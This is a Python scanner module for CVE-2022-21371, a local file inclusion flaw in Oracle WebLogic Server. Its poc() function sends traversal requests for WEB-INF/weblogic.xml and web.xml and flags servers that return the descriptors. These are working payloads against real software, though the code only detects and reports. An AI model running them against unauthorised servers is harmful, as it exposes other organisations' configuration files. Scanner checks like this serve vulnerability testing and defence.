CVE-2022-21371.py
import requests
# Vuln Base Info
def info():
    """Return the static metadata record for this check (CVE-2022-21371).

    A fresh dict is built on every call, so callers may modify the result
    without affecting later calls. The ``cwe-id`` and ``vuln-target`` fields
    are left as empty strings.
    """
    advisory_links = [
        "https://www.oracle.com/security-alerts/cpujan2022.html",
        "https://nvd.nist.gov/vuln/detail/CVE-2022-21371",
        "https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786"
    ]
    scoring = {
        "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "cvss-score": "7.5",
        "cve-id": "CVE-2022-21371",
        "cwe-id": ""
    }

    # Keys are inserted in the same order as the flat literal this replaces.
    record = {}
    record["author"] = "cckuailong"
    record["name"] = '''Oracle WebLogic Server Local File Inclusion'''
    record["description"] = '''An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.'''
    record["severity"] = "high"
    record["references"] = advisory_links
    record["classification"] = scoring
    record["metadata"] = {"vuln-target": ""}
    record["tags"] = ["cve", "cve2022", "lfi", "weblogic", "oracle"]
    return record
# Vendor Fingerprint
def fingerprint(url):
    """Vendor fingerprint hook for this check.

    Placeholder implementation: ``url`` is not inspected and no request is
    sent, so every target is reported as matching and callers get no vendor
    filtering from this function.
    """
    matched = True
    return matched
# Proof of Concept
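def poc(url):
    """Check whether *url* serves its WEB-INF deployment descriptors (CVE-2022-21371).

    Each descriptor path is requested below the normalised base URL. The
    target is reported as affected when a response has status 200, contains a
    complete ``<web-app>`` or ``<weblogic-web-app>`` element and declares an
    XML content type. A positive result means the descriptors are readable
    without authentication; the vendor advisory is listed in
    ``info()["references"]``.

    Args:
        url: Base URL or bare host of the server to check; normalised with
            ``format_url``.

    Returns:
        dict: ``{"success": True, "info": ..., "payload": ...}`` for the first
        path that matches, ``{"success": False}`` when the check raised an
        error, and an empty dict when no path matched.
    """
    result = {}
    try:
        url = format_url(url)

        paths = [
            ".//WEB-INF/weblogic.xml",
            ".//WEB-INF/web.xml"
        ]
        for path in paths:
            # verify=False turns off TLS certificate validation, presumably so
            # hosts with self-signed certificates can still be checked. The
            # response is therefore unauthenticated: treat it as a detection
            # signal only. Redirects are not followed, so only the requested
            # host's own answer is evaluated.
            resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)

            body = resp.text
            has_descriptor = (
                ("<web-app" in body and "</web-app>" in body)
                or ("<weblogic-web-app" in body and "</weblogic-web-app>" in body)
            )
            # Look at the Content-Type header only. Searching the string form
            # of every header could match "text/xml" in an unrelated header
            # and report a false positive.
            content_type = resp.headers.get("Content-Type", "").lower()
            is_xml = "text/xml" in content_type or "application/xml" in content_type

            if resp.status_code == 200 and has_descriptor and is_xml:
                result["success"] = True
                result["info"] = info()
                result["payload"] = url+path
                return result
    except Exception:
        # Best-effort check: any request or parsing failure counts as "not
        # confirmed". Catching Exception rather than using a bare except lets
        # KeyboardInterrupt and SystemExit propagate so a scan can be stopped.
        result["success"] = False

    # NOTE(review): when no path matched this returns {} without a "success"
    # key; callers should read the flag with result.get("success").
    return result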
# Exploit, can be the same as poc()
def exp(url):
    """Run the exploit stage for *url*.

    This check has no separate exploit step: the call is forwarded to
    ``poc`` and its result dict is returned unchanged.
    """
    outcome = poc(url)
    return outcome
# Utils
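def format_url(url):
    """Normalise a target into a base URL with a scheme and no trailing slash.

    Surrounding whitespace is stripped, ``http://`` is prepended when the
    value has no http/https scheme, and trailing ``/`` characters are removed.
    The scheme test is case-insensitive, so ``HTTPS://host`` is recognised as
    already having a scheme instead of being prefixed a second time.

    Args:
        url: Target given as a URL or a bare ``host[:port]`` string.

    Returns:
        str: The normalised base URL.
    """
    url = url.strip()
    # URL schemes are case-insensitive; compare on a lowered copy and leave
    # the caller's original spelling untouched.
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")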